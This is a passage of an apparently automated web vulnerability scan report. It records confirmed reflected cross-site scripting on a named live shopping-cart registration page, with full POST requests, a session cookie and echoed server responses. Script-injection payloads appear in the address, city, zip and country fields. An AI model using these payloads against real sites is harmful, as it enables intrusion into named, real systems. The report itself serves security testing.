&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x0001E0)</script>"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST '"--></style></script><script>alert(0x0001E1)</script>
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001E1)%3c%2fscript%3e&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:30 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="'"--></style></script><script>netsparker(0x0001E1)</script>"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST '"--></style></script><script>alert(0x0001F1)</script>
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001F1)%3c%2fscript%3e&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:43:01 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="'"--></style></script><script>netsparker(0x0001F1)</script>"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST '"--></style></script><script>alert(0x0001F2)</script>
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001F2)%3c%2fscript%3e&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:43:04 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
